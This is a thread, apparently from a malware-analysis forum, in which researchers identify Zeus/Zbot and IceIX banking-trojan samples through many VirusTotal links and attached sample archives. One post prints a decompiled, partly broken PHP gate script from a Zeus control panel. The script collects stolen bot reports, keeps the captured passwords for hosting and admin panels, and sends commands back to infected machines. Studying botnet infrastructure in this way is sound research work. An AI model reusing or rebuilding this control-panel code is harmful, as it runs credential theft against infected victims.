A forum for reverse engineering, OS internals and malware analysis 

Forum for analysis and discussion about malware.
 #21727  by Kafeine
 Wed Dec 18, 2013 8:14 am
​​The group behind the Citadel 1.3.5.1 that was striking Japan has moved to something else.
It looks like an older version of zeus...which would be too weird to be true.
​Have been told that it could be Zeus PowerLoader

Anyone knowing this stuff can give an appropriate name to the attached sample ?

64a39e6c10c58fca07d17620b9864fdf

Here successfully handled by Cuckoo :
https://malwr.com/analysis/MTZmMDQ5MDhi ... 0315363cb3
Attachments
(42.61 KiB) Downloaded 69 times
 #21810  by Xylitol
 Sat Dec 28, 2013 10:24 am
Some zbot, see comment in VT for more info.

Zeus 2.1.0.1:
https://www.virustotal.com/en/file/af8e ... /analysis/
https://www.virustotal.com/en/file/b422 ... /analysis/
https://www.virustotal.com/en/file/95bc ... /analysis/
https://www.virustotal.com/en/file/3ffa ... /analysis/
https://www.virustotal.com/en/file/1d66 ... /analysis/
https://www.virustotal.com/en/file/2d01 ... /analysis/
https://www.virustotal.com/en/file/75d1 ... /analysis/
https://www.virustotal.com/en/file/ade5 ... /analysis/
https://www.virustotal.com/en/file/3ec3 ... /analysis/
https://www.virustotal.com/en/file/094f ... /analysis/
https://www.virustotal.com/en/file/f2cb ... /analysis/
https://www.virustotal.com/en/file/930b ... /analysis/
https://www.virustotal.com/en/file/f029 ... /analysis/
https://www.virustotal.com/en/file/5274 ... /analysis/
https://www.virustotal.com/en/file/b627 ... /analysis/
https://www.virustotal.com/en/file/1cdb ... /analysis/
https://www.virustotal.com/en/file/4ac3 ... /analysis/
https://www.virustotal.com/en/file/e6fd ... /analysis/
https://www.virustotal.com/en/file/8129 ... /analysis/
https://www.virustotal.com/en/file/b1aa ... /analysis/
https://www.virustotal.com/en/file/7533 ... /analysis/
https://www.virustotal.com/en/file/ace9 ... /analysis/
https://www.virustotal.com/en/file/df40 ... /analysis/
https://www.virustotal.com/en/file/df40 ... /analysis/
https://www.virustotal.com/en/file/d524 ... /analysis/
https://www.virustotal.com/en/file/dd99 ... /analysis/
https://www.virustotal.com/en/file/0e8d ... /analysis/
https://www.virustotal.com/en/file/f75e ... /analysis/
https://www.virustotal.com/en/file/ea26 ... /analysis/
https://www.virustotal.com/en/file/dbcf ... /analysis/
https://www.virustotal.com/en/file/5e53 ... /analysis/
https://www.virustotal.com/en/file/cd04 ... /analysis/
https://www.virustotal.com/en/file/9d07 ... /analysis/
https://www.virustotal.com/en/file/a0c0 ... /analysis/
https://www.virustotal.com/en/file/4aea ... /analysis/

Zeus 2.0.8.9:
https://www.virustotal.com/en/file/24b1 ... /analysis/
https://www.virustotal.com/en/file/49ef ... /analysis/
https://www.virustotal.com/en/file/4607 ... /analysis/
https://www.virustotal.com/en/file/5035 ... /analysis/
https://www.virustotal.com/en/file/ed28 ... /analysis/
https://www.virustotal.com/en/file/4025 ... /analysis/
https://www.virustotal.com/en/file/1c0a ... /analysis/
https://www.virustotal.com/en/file/5d3a ... /analysis/
https://www.virustotal.com/en/file/bcfb ... /analysis/
https://www.virustotal.com/en/file/5db3 ... /analysis/
https://www.virustotal.com/en/file/bc8f ... 387473140/
https://www.virustotal.com/en/file/d834 ... /analysis/
https://www.virustotal.com/en/file/4b5e ... /analysis/
https://www.virustotal.com/en/file/e4c8 ... /analysis/

IceIX:
https://www.virustotal.com/en/file/7d9f ... /analysis/
https://www.virustotal.com/en/file/8ddb ... /analysis/
https://www.virustotal.com/en/file/11ba ... /analysis/
https://www.virustotal.com/en/file/215e ... /analysis/
https://www.virustotal.com/en/file/d588 ... /analysis/
https://www.virustotal.com/en/file/c2d4 ... /analysis/
https://www.virustotal.com/en/file/6980 ... /analysis/
https://www.virustotal.com/en/file/30fc ... 387204530/
https://www.virustotal.com/en/file/e148 ... /analysis/
https://www.virustotal.com/en/file/137e ... 387284072/
https://www.virustotal.com/en/file/4ee2 ... /analysis/
https://www.virustotal.com/en/file/1afd ... /analysis/
https://www.virustotal.com/en/file/7dd9 ... /analysis/
https://www.virustotal.com/en/file/6da1 ... /analysis/
https://www.virustotal.com/en/file/a5f4 ... 387385453/
https://www.virustotal.com/en/file/675e ... /analysis/
https://www.virustotal.com/en/file/109b ... /analysis/
https://www.virustotal.com/en/file/992a ... /analysis/
https://www.virustotal.com/en/file/c62b ... /analysis/
https://www.virustotal.com/en/file/5a97 ... /analysis/
https://www.virustotal.com/en/file/9ad2 ... /analysis/
 #21851  by Xylitol
 Fri Jan 03, 2014 2:52 pm
Image Image Image Image Image
Weird zeus, Control Panel 2.7.6.8, Builder 2.9.6.1
praim.exe: https://www.virustotal.com/en/file/382e ... 388760471/
bk.exe: https://www.virustotal.com/en/file/0ea5 ... 388760480/
C&C require ioncube loader, no more RC4 (when trying to decode: MCRYPT_RIJNDAEL_128, MCRYPT_MODE_ECB)
decode try:
Code: Select all
if(!extension_loaded('ionCube Loader')){$__oc=strtolower(substr(php_uname(),0,3));$__ln='ioncube_loader_'.$__oc.'_'.substr(phpversion(),0,3).(($__oc=='win')?'.dll':'.so');if(function_exists('dl')){@dl($__ln);}if(function_exists('_il_exec')){return _il_exec();}$__ln='/ioncube/'.$__ln;$__oid=$__id=realpath(ini_get('extension_dir'));$__here=dirname(__FILE__);if(strlen($__id)>1&&$__id[1]==':'){$__id=str_replace('\\','/',substr($__id,2));$__here=str_replace('\\','/',substr($__here,2));}$__rd=str_repeat('/..',substr_count($__id,'/')).$__here.'/';$__i=strlen($__rd);while($__i--){if($__rd[$__i]=='/'){$__lp=substr($__rd,0,$__i).$__ln;if(file_exists($__oid.$__lp)){$__ln=$__lp;break;}}}if(function_exists('dl')){@dl($__ln);}}else{die('The file '.__FILE__." is corrupted.\n");}if(function_exists('_il_exec')){return _il_exec();}echo('Site error: the file <b>'.__FILE__.'</b> requires the ionCube PHP Loader '.basename($__ln).' to be installed by the website operator. If you are the website operator please use the <a href="http://www.ioncube.com/lw/">ionCube Loader Wizard</a> to assist with installation.');exit(199);
?>"

<?php

function toUint($str) {
    @unpack( 'L', $str );
    $q = ;
    return (( is_array( $q ) && is_numeric( $q[1] ) ) ? ($q[1] < 0 ? sprintf( '%u', $q[1] ) : $q[1]) : 0);
}

function toInt($str) {
    @unpack( 'l', $str );
    $q = ;
    return (( is_array( $q ) && is_numeric( $q[1] ) ) ? $q[1] : 0);
}

function toUshort($str) {
    @unpack( 'S', $str );
    $q = ;
    return (( is_array( $q ) && is_numeric( $q[1] ) ) ? $q[1] : 0);
}

function isHackNameForPath($name) {
    strlen( $name );
    $len = ;
    return (( ( ( ( 0 < $len && substr_count( $name, '.' ) < $len ) && strpos( $name, '/' ) === false ) && strpos( $name, '\' ) === false ) && strpos( $name, '' ) === false ) ? false : true);
    }

    define( '__REPORT__', 1 );

    if ($_SERVER['REQUEST_METHOD'] != 'POST') {
        exit(  );
    }

    require_once( 'system/config.php' );
    @file_get_contents( 'php://input' );
                    $data = ;
                    @strlen( $data );
                    $dataSize = ;

                    if ($dataSize < HEADER_SIZE + ITEM_HEADER_SIZE) {
                        exit(  );
                    }

                    $config['botnet_cryptkey'];
                    $key = ;
                    mcrypt_module_open( MCRYPT_RIJNDAEL_128, '', MCRYPT_MODE_ECB, '' );
                    $td = ;
                    mcrypt_create_iv( mcrypt_enc_get_iv_size( $td ), MCRYPT_RAND );
                    $iv = ;
                    mcrypt_generic_init( $td, $key, $iv );
                    mdecrypt_generic( $td, $data );
                    $data = ;
                    visualDecrypt( $data );

                    if (strcmp( md5( substr( $data, HEADER_SIZE ), true ), substr( $data, HEADER_MD5, 16 ) ) !== 0) {
                        mcrypt_generic_deinit( $td );
                        mcrypt_module_close( $td );
                        exit(  );
                    }

                    $list = array(  );
                    $i = HEADER_SIZE;

                    while ($i < $dataSize) {
                        unpack( 'L4', @substr( $data, $i, ITEM_HEADER_SIZE ) );
                        $k = ;
                        $list[$k[1]] = @substr( $data, $i + ITEM_HEADER_SIZE, $k[3] );
                        $i += ITEM_HEADER_SIZE + $k[3];
                    }

                    unset( $$data );

                    if (( empty( $list[SBCID_BOT_VERSION] ) || empty( $list[SBCID_BOT_ID] ) )) {
                        mcrypt_generic_deinit( $td );
                        mcrypt_module_close( $td );
                        exit(  );
                    }


                    if (!connectToDb(  )) {
                        mcrypt_generic_deinit( $td );
                        mcrypt_module_close( $td );
                        exit(  );
                    }

                    require_once( 'system/geoip.php' );
                    dirname( __FILE__ );
                    $dirname = ;
                    $realIpv4 = (!empty( $_GET['ip'] ) ? addslashes( trim( $_GET['ip'] ) ) : $_SERVER['REMOTE_ADDR']);
                    $cool_geoip_file = $dirname . '/system/geoip.dat';
                    geoip_open( $cool_geoip_file, GEOIP_STANDARD );
                    $cool_gi = ;
                    geoip_country_code_by_addr( $cool_gi, $realIpv4 );
                    $cool_cc = ;
                    geoip_close( $cool_gi );
                    str_replace( ' ', ' ', trim( $list[SBCID_BOT_ID] ) );
                    $botId = ;
                    addslashes( $botId );
                    $botIdQ = ;
                    $botnet = (empty( $list[SBCID_BOTNET] ) ? DEFAULT_BOTNET : str_replace( ' ', ' ', trim( $list[SBCID_BOTNET] ) ));
                    addslashes( $botnet );
                    $botnetQ = ;
                    toUint( $list[SBCID_BOT_VERSION] );
                    $botVersion = ;
                    $country = (!empty( $$cool_cc ) ? $cool_cc : '--');
                    addslashes( $country );
                    $countryQ = ;
                    time(  );
                    $curTime = ;

                    if (( ( !empty( $list[SBCID_SCRIPT_ID] ) && ( isset( $list[SBCID_SCRIPT_STATUS] ) && isset( $list[SBCID_SCRIPT_RESULT] ) ) ) && strlen( $list[SBCID_SCRIPT_ID] ) == 16 )) {
                        if (!mysqlQueryEx( 'botnet_scripts_stat',  . 'INSERT INTO `botnet_scripts_stat` SET `bot_id`=\'' . $botIdQ . '\', `bot_version`=' . $botVersion . ', `rtime`=' . $curTime . ', ' . '`extern_id`=\'' . addslashes( $list[SBCID_SCRIPT_ID] ) . '\',' . '`type`=' . (toInt( $list[SBCID_SCRIPT_STATUS] ) == 0 ? 2 : 3) . ',' . '`report`=\'' . addslashes( $list[SBCID_SCRIPT_RESULT] ) . '\'' )) {
                            mcrypt_generic_deinit( $td );
                            mcrypt_module_close( $td );
                            exit(  );
                        }
                    }
                    else {
                        if (( !empty( $list[SBCID_BOTLOG] ) && !empty( $list[SBCID_BOTLOG_TYPE] ) )) {
                            toInt( $list[SBCID_BOTLOG_TYPE] );
                            $type = ;

                            if ($type == BLT_FILE) {
                                $bad_exts = array( '.php3', '.php4', '.php5', '.php', '.asp', '.aspx', '.exe', '.pl', '.cgi', '.cmd', '.bat', '.phtml', '.htaccess' );
                                $fd_hash = 7;
                                strlen( $list[SBCID_BOTLOG] );
                                $fd_size = ;

                                if (( isHackNameForPath( $botId ) || isHackNameForPath( $botnet ) )) {
                                    mcrypt_generic_deinit( $td );
                                    mcrypt_module_close( $td );
                                    exit(  );
                                }

                                $file_root = $config['reports_path'] . '/files/' . urlencode( $botnet ) . '/' . urlencode( $botId );
                                $file_path = $cool_path;
                                $last_name = '';
                                explode( '/', (( isset( $list[SBCID_PATH_DEST] ) && 0 < strlen( $list[SBCID_PATH_DEST] ) ) ? str_replace( '\', '/', $list[SBCID_PATH_DEST] ) : 'unknown') );
                $l = ;
                foreach ($l as ) {
                    $k = &;

                    if (isHackNameForPath( $k )) {
                        mcrypt_generic_deinit( $td );
                        mcrypt_module_close( $td );
                        exit(  );
                    }

                    urlencode( $k );
                    $file_path .= '/' . $last_name = ;
                }


                if (strlen( $last_name ) === 0) {
                    $file_path .= '/unknown.dat';
                }

                unset( $$l );
                strrchr( $last_name, '.' );

                if (( $ext =  === false || in_array( strtolower( $ext ), $bad_exts ) !== false )) {
                    $file_path .= '.dat';
                }

                strrpos( $file_path, '.' );
                $ext_pos = ;

                if (180 < strlen( $file_path )) {
                    $file_path = $file_root . '/longname.dat';
                }

                $i = 7;

                while ($i < 9999) {
                    if ($i == 0) {
                        $f = $content;
                    }
else {
                        substr_replace( $file_path, '(' . $i . ').', $ext_pos, 1 );
                        $f = ;
                    }


                    if (file_exists( $f )) {
                        if ($fd_size == filesize( $f )) {
                            if ($fd_hash === 0) {
                                md5( $list[SBCID_BOTLOG], true );
                                $fd_hash = ;
                            }


                            if (strcmp( md5_file( $f, true ), $fd_hash ) === 0) {
                                break;
                            }
                        }
                    }

                    fopen( $f, 'wb' );

                    if (( !createDir( dirname( $file_path ) ) || !$h =  )) {
                        mcrypt_generic_deinit( $td );
                        mcrypt_module_close( $td );
                        exit(  );
                    }

                    flock( $h, LOCK_EX );
                    fwrite( $h, $list[SBCID_BOTLOG] );
                    flock( $h, LOCK_UN );
                    fclose( $h );
                    break;
                    ++$i;
                }
            }
else {
                if ($config['reports_to_db'] === 1) {
                    $cool_write = 'YES';
                    $cool_path = (empty( $list[SBCID_PATH_SOURCE] ) ? '' : $list[SBCID_PATH_SOURCE]);
                    $content = (empty( $list[SBCID_BOTLOG] ) ? '' : $list[SBCID_BOTLOG]);

                    if (!empty( $$cool_path )) {
                        if (( ( ( ( ( stripos( $cool_path, 'http://' ) !== false || stripos( $cool_path, 'facebook.com' ) !== false ) || stripos( $cool_path, 'bar-navig.yandex.ru' ) !== false ) || stripos( $cool_path, '/channel/bind' ) !== false ) || stripos( $cool_path, 'mail.google.com/mail/u/' ) !== false ) || stripos( $cool_path, 'plus.google.com/u/' ) !== false )) {
                                            $cool_write = 'NO';
                                        }


                                        if (( ( ( stripos( $cool_path, ':2222/CMD_LOGIN' ) !== false || ( stripos( $cool_path, ':208' ) !== false && stripos( $cool_path, '/login' ) !== false ) ) || ( stripos( $cool_path, '/ispmgr' ) !== false && stripos( $content, 'password=' ) !== false ) ) || ( stripos( $cool_path, '/vdsmgr' ) !== false && stripos( $content, 'password=' ) !== false ) )) {
                                            $cool_write = 'YES';
                                        }


                                        if (( ( ( ( ( ( stripos( $cool_path, 'admin' ) !== false && stripos( $cool_path, 'wp-admin' ) === false ) || stripos( $cool_path, 'panel' ) !== false ) || stripos( $cool_path, 'staff' ) !== false ) || stripos( $cool_path, 'editor' ) !== false ) || stripos( $cool_path, 'manager' ) !== false ) && ( ( ( ( ( stripos( $content, 'AUTH_PW=' ) !== false || stripos( $content, 'pass=' ) !== false ) || stripos( $content, 'passwd=' ) !== false ) || stripos( $content, 'password=' ) !== false ) || stripos( $content, 'pwd=' ) !== false ) || stripos( $content, 'HTTP authentication: username=' ) !== false ) )) {
                                            $cool_write = 'YES';
                                        }


                                        if (( ( stripos( $cool_path, 'http://192.168.' ) !== false || stripos( $cool_path, 'localhost' ) !== false ) || stripos( $cool_path, '.local' ) !== false )) {
                                            $cool_write = 'NO';
                                        }
                                    }


                                    if ($cool_write == 'YES') {
                                        $table = 'botnet_reports_' . gmdate( 'ymd', $curTime );
                                        $query = (  . 'INSERT INTO `' . $table . '` SET `bot_id`=\'' . $botIdQ . '\', `botnet`=\'' . $botnetQ . '\', `bot_version`=' . $botVersion . ', `type`=' . $type . ', `country`=\'' . $countryQ . '\', `rtime`=' . $curTime . ',' ) . 'path_source=\'' . (empty( $list[SBCID_PATH_SOURCE] ) ? '' : addslashes( $list[SBCID_PATH_SOURCE] )) . '\',' . 'path_dest=\'' . (empty( $list[SBCID_PATH_DEST] ) ? '' : addslashes( $list[SBCID_PATH_DEST] )) . '\',' . 'time_system=' . (empty( $list[SBCID_TIME_SYSTEM] ) ? 0 : toUint( $list[SBCID_TIME_SYSTEM] )) . ',' . 'time_tick=' . (empty( $list[SBCID_TIME_TICK] ) ? 0 : toUint( $list[SBCID_TIME_TICK] )) . ',' . 'time_localbias=' . (empty( $list[SBCID_TIME_LOCALBIAS] ) ? 0 : toInt( $list[SBCID_TIME_LOCALBIAS] )) . ',' . 'os_version=\'' . (empty( $list[SBCID_OS_INFO] ) ? '' : addslashes( $list[SBCID_OS_INFO] )) . '\',' . 'language_id=' . (empty( $list[SBCID_LANGUAGE_ID] ) ? 0 : toUshort( $list[SBCID_LANGUAGE_ID] )) . ',' . 'process_name=\'' . (empty( $list[SBCID_PROCESS_NAME] ) ? '' : addslashes( $list[SBCID_PROCESS_NAME] )) . '\',' . 'process_user=\'' . (empty( $list[SBCID_PROCESS_USER] ) ? '' : addslashes( $list[SBCID_PROCESS_USER] )) . '\',' . 'ipv4=\'' . addslashes( $realIpv4 ) . '\',' . 'context=\'' . addslashes( $list[SBCID_BOTLOG] ) . '\'';

                                        if (( !mysqlQueryEx( $table, $query ) && ( !@mysql_query(  . 'CREATE TABLE IF NOT EXISTS `' . $table . '` LIKE `botnet_reports`' ) || !mysqlQueryEx( $table, $query ) ) )) {
                                            mcrypt_generic_deinit( $td );
                                            mcrypt_module_close( $td );
                                            exit(  );
                                        }
                                    }
                                }


                                if ($config['reports_to_fs'] === 1) {
                                    if (( isHackNameForPath( $botId ) || isHackNameForPath( $botnet ) )) {
                                        mcrypt_generic_deinit( $td );
                                        mcrypt_module_close( $td );
                                        exit(  );
                                    }

                                    $file_path = $config['reports_path'] . '/other/' . urlencode( $botnet ) . '/' . urlencode( $botId );
                                    fopen( $file_path . '/reports.txt', 'ab' );

                                    if (( !createDir( $file_path ) || !$h =  )) {
                                        mcrypt_generic_deinit( $td );
                                        mcrypt_module_close( $td );
                                        exit(  );
                                    }

                                    flock( $h, LOCK_EX );
                                    fwrite( $h, str_repeat( '=', 80 ) . '
' . (  . 'bot_id=' . $botId . '
' ) . (  . 'botnet=' . $botnet . '
' ) . 'bot_version=' . intToVersion( $botVersion ) . '
' . (  . 'ipv4=' . $realIpv4 . '
' ) . (  . 'country=' . $country . '
' ) . (  . 'type=' . $type . '
' ) . 'rtime=' . gmdate( 'H:i:s d.m.Y', $curTime ) . '
' . 'time_system=' . (empty( $list[SBCID_TIME_SYSTEM] ) ? 0 : gmdate( 'H:i:s d.m.Y', toInt( $list[SBCID_TIME_SYSTEM] ) )) . '
' . 'time_tick=' . (empty( $list[SBCID_TIME_TICK] ) ? 0 : tickCountToText( toUint( $list[SBCID_TIME_TICK] ) / 1000 )) . '
' . 'time_localbias=' . (empty( $list[SBCID_TIME_LOCALBIAS] ) ? 0 : timeBiasToText( toInt( $list[SBCID_TIME_LOCALBIAS] ) )) . '
' . 'os_version=' . (empty( $list[SBCID_OS_INFO] ) ? '' : osDataToString( $list[SBCID_OS_INFO] )) . '
' . 'language_id=' . (empty( $list[SBCID_LANGUAGE_ID] ) ? 0 : toUshort( $list[SBCID_LANGUAGE_ID] )) . '
' . 'process_name=' . (empty( $list[SBCID_PROCESS_NAME] ) ? '' : $list[SBCID_PROCESS_NAME]) . '
' . 'process_user=' . (empty( $list[SBCID_PROCESS_USER] ) ? '' : $list[SBCID_PROCESS_USER]) . '
' . 'path_source=' . (empty( $list[SBCID_PATH_SOURCE] ) ? '' : $list[SBCID_PATH_SOURCE]) . '
' . 'context=
' . $list[SBCID_BOTLOG] . '


' );
                                    flock( $h, LOCK_UN );
                                    fclose( $h );
                                }
                            }
                        }
                        else {
                            if (!empty( $list[SBCID_NET_LATENCY] )) {
                                $query =  . '`bot_id`=\'' . $botIdQ . '\', `botnet`=\'' . $botnetQ . '\', `bot_version`=' . $botVersion . ', `country`=\'' . $countryQ . '\', `rtime_last`=' . $curTime . ', ' . '`net_latency`=' . (empty( $list[SBCID_NET_LATENCY] ) ? 0 : toUint( $list[SBCID_NET_LATENCY] )) . ', ' . '`tcpport_s1`=' . (empty( $list[SBCID_TCPPORT_S1] ) ? 0 : toUshort( $list[SBCID_TCPPORT_S1] )) . ', ' . '`time_localbias`=' . (empty( $list[SBCID_TIME_LOCALBIAS] ) ? 0 : toInt( $list[SBCID_TIME_LOCALBIAS] )) . ', ' . '`os_version`=\'' . (empty( $list[SBCID_OS_INFO] ) ? '' : addslashes( $list[SBCID_OS_INFO] )) . '\', ' . '`language_id`=' . (empty( $list[SBCID_LANGUAGE_ID] ) ? 0 : toUshort( $list[SBCID_LANGUAGE_ID] )) . ', ' . '`ipv4_list`=\'' . (empty( $list[SBCID_IPV4_ADDRESSES] ) ? '' : addslashes( $list[SBCID_IPV4_ADDRESSES] )) . '\', ' . '`ipv6_list`=\'' . (empty( $list[SBCID_IPV6_ADDRESSES] ) ? '' : addslashes( $list[SBCID_IPV6_ADDRESSES] )) . '\', ' . '`ipv4`=\'' . addslashes( pack( 'N', ip2long( $realIpv4 ) ) ) . '\'';

                                if (!mysqlQueryEx( 'botnet_list', (  . 'INSERT INTO `botnet_list` SET `comment`=\'\', `rtime_first`=' . $curTime . ', `rtime_online`=' . $curTime . ', ' . $query . ' ' ) . 'ON DUPLICATE KEY UPDATE `rtime_online`=IF(`rtime_last` <= ' . ( $curTime - $config['botnet_timeout'] ) . (  . ', ' . $curTime . ', `rtime_online`), ' . $query ) )) {
                                    mcrypt_generic_deinit( $td );
                                    mcrypt_module_close( $td );
                                    exit(  );
                                }

                                unset( $$query );
                                $replyData = '';
                                $replyCount = 7;
                                toSqlSafeMask( $botIdQ );
                                $botIdQm = ;
                                toSqlSafeMask( $botnetQ );
                                $botnetQm = ;
                                toSqlSafeMask( $countryQ );
                                $countryQm = ;
                                mysqlQueryEx( 'botnet_scripts', 'SELECT `extern_id`, `script_bin`, `send_limit`, `id` FROM `botnet_scripts` WHERE `flag_enabled`=1 AND ' . (  . '(`countries_wl`=\'\' OR `countries_wl` LIKE BINARY \'% ' . $countryQm . ' %\') AND ' ) . (  . '(`countries_bl` NOT LIKE BINARY \'% ' . $countryQm . ' %\') AND ' ) . (  . '(`botnets_wl`=\'\' OR `botnets_wl` LIKE BINARY \'% ' . $botnetQm . ' %\') AND ' ) . (  . '(`botnets_bl` NOT LIKE BINARY \'% ' . $botnetQm . ' %\') AND ' ) . (  . '(`bots_wl`=\'\' OR `bots_wl` LIKE BINARY \'% ' . $botIdQm . ' %\') AND ' ) . (  . '(`bots_bl` NOT LIKE BINARY \'% ' . $botIdQm . ' %\') ' ) . 'LIMIT 10' );
                                $r = ;

                                if ($r) {
                                    mysql_fetch_row( $r );

                                    if ($m = ) {
                                        addslashes( $m[0] );
                                        $eid = ;
                                        mysqlQueryEx( 'botnet_scripts_stat', (  . 'SELECT COUNT(*) FROM `botnet_scripts_stat` WHERE `type`=1 AND `extern_id`=\'' . $eid . '\'' ) );
                                        mysql_fetch_row( $j );

                                        if (( ( ( $m[2] != 0 && $j =  ) && $c =  ) && $m[2] <= $c[0] )) {
                                            mysqlQueryEx( 'botnet_scripts',  . 'UPDATE `botnet_scripts` SET `flag_enabled`=0 WHERE `id`=' . $m[3] . ' LIMIT 1' );
                                            continue;
                                        }


                                        if (mysqlQueryEx( 'botnet_scripts_stat',  . 'INSERT HIGH_PRIORITY INTO `botnet_scripts_stat` SET `extern_id`=\'' . $eid . '\', `type`=1, `bot_id`=\'' . $botIdQ . '\', `bot_version`=' . $botVersion . ', `rtime`=' . $curTime . ', `report`=\'Sended\'' )) {
                                            $size = strlen( $m[1] ) + strlen( $m[0] );
                                            $replyData .= pack( 'LLLL', ++$replyCount, 0, $size, $size ) . $m[0] . $m[1];
                                        }
                                    }
                                }


                                if (0 < $replyCount) {
                                    $replyData = pack( 'LLLLLLLL', mt_rand(  ), mt_rand(  ), mt_rand(  ), mt_rand(  ), mt_rand(  ), HEADER_SIZE + strlen( $replyData ), 0, $replyCount ) . md5( $replyData, true ) . $replyData;
                                    visualEncrypt( $replyData );
                                    mcrypt_generic_deinit( $td );
                                    mcrypt_generic_init( $td, $key, $iv );
                                    mcrypt_generic( $td, $replyData );
                                    $replyData = ;
                                    mcrypt_generic_deinit( $td );
                                    mcrypt_module_close( $td );
                                    echo $replyData;
                                    exit(  );
                                }
                            }
                            else {
                                mcrypt_generic_deinit( $td );
                                mcrypt_module_close( $td );
                                exit(  );
                            }
                        }
                    }

                    $replyData = pack( 'LLLLLLLL', mt_rand(  ), mt_rand(  ), mt_rand(  ), mt_rand(  ), mt_rand(  ), HEADER_SIZE + ITEM_HEADER_SIZE, 0, 1 ) . 'Jç 6äKù¿yÒu.#H ¥';
                    visualEncrypt( $replyData );
                    mcrypt_generic_deinit( $td );
                    mcrypt_generic_init( $td, $key, $iv );
                    mcrypt_generic( $td, $replyData );
                    $replyData = require_once( 'system/global.php' );
                    mcrypt_generic_deinit( $td );
                    mcrypt_module_close( $td );
                    echo $replyData;
                    exit(  );
?>
Edit: webinject don't work on Opera 18.0 and Chrome 31.0.1650.63 m, latest firefox (26.0): OK.
Attachments
infected
(2.41 MiB) Downloaded 92 times
 #21860  by Xylitol
 Sat Jan 04, 2014 2:01 pm
Zbot pack from previous link (http://www.kernelmode.info/forum/viewto ... 210#p21810)
And some new:
Zeus 2.1.0.1:
https://www.virustotal.com/en/file/95d4 ... /analysis/
https://www.virustotal.com/en/file/b728 ... /analysis/
https://www.virustotal.com/en/file/eaeb ... /analysis/
https://www.virustotal.com/en/file/ed87 ... /analysis/
https://www.virustotal.com/en/file/7bb7 ... /analysis/
https://www.virustotal.com/en/file/1869 ... /analysis/
https://www.virustotal.com/en/file/019b ... 388578127/
https://www.virustotal.com/en/file/be13 ... /analysis/
https://www.virustotal.com/en/file/cf82 ... /analysis/
https://www.virustotal.com/en/file/a83e ... 388578713/
https://www.virustotal.com/en/file/95d4 ... /analysis/
https://www.virustotal.com/en/file/b728 ... /analysis/
https://www.virustotal.com/en/file/eaeb ... /analysis/
https://www.virustotal.com/en/file/ed87 ... /analysis/
https://www.virustotal.com/en/file/7bb7 ... /analysis/
https://www.virustotal.com/en/file/1869 ... /analysis/
https://www.virustotal.com/en/file/1716 ... /analysis/
https://www.virustotal.com/en/file/f4a1 ... /analysis/
https://www.virustotal.com/en/file/cd8e ... /analysis/
https://www.virustotal.com/en/file/4562 ... /analysis/
https://www.virustotal.com/en/file/9fb3 ... /analysis/
https://www.virustotal.com/en/file/1b74 ... /analysis/
https://www.virustotal.com/en/file/fc82 ... /analysis/

Zeus 2.0.8.9:
https://www.virustotal.com/en/file/8104 ... /analysis/
https://www.virustotal.com/en/file/24b6 ... /analysis/
https://www.virustotal.com/en/file/8104 ... /analysis/
https://www.virustotal.com/en/file/24b6 ... /analysis/
https://www.virustotal.com/en/file/c315 ... /analysis/
https://www.virustotal.com/en/file/557a ... /analysis/
https://www.virustotal.com/en/file/94a2 ... /analysis/
https://www.virustotal.com/en/file/4aef ... /analysis/
https://www.virustotal.com/en/file/3c49 ... /analysis/
https://www.virustotal.com/en/file/2ca8 ... /analysis/

IceIX:
https://www.virustotal.com/en/file/9108 ... /analysis/
https://www.virustotal.com/en/file/54dd ... /analysis/
https://www.virustotal.com/en/file/42af ... /analysis/
https://www.virustotal.com/en/file/0562 ... /analysis/
https://www.virustotal.com/en/file/113b ... 388577741/
https://www.virustotal.com/en/file/8ac8 ... /analysis/
https://www.virustotal.com/en/file/b6c4 ... /analysis/
https://www.virustotal.com/en/file/c2ba ... /analysis/
https://www.virustotal.com/en/file/9108 ... /analysis/
https://www.virustotal.com/en/file/54dd ... /analysis/
https://www.virustotal.com/en/file/42af ... /analysis/
https://www.virustotal.com/en/file/0562 ... /analysis/
Attachments
infected
(3.22 MiB) Downloaded 90 times
infected
(3.18 MiB) Downloaded 87 times
infected
(5 MiB) Downloaded 83 times
infected
(3.4 MiB) Downloaded 85 times
 #21889  by Xylitol
 Tue Jan 07, 2014 3:08 pm
Zeus Infection Spoofing Bitdefender AV ~ http://www.webroot.com/blog/2014/01/06/ ... fender-av/
https://www.virustotal.com/en/file/0469 ... 389107122/
i'm not familiar with this one, the bin is weird.
Attachments
infected
(211.01 KiB) Downloaded 64 times
  • 1
  • 20
  • 21
  • 22
  • 23
  • 24
  • 29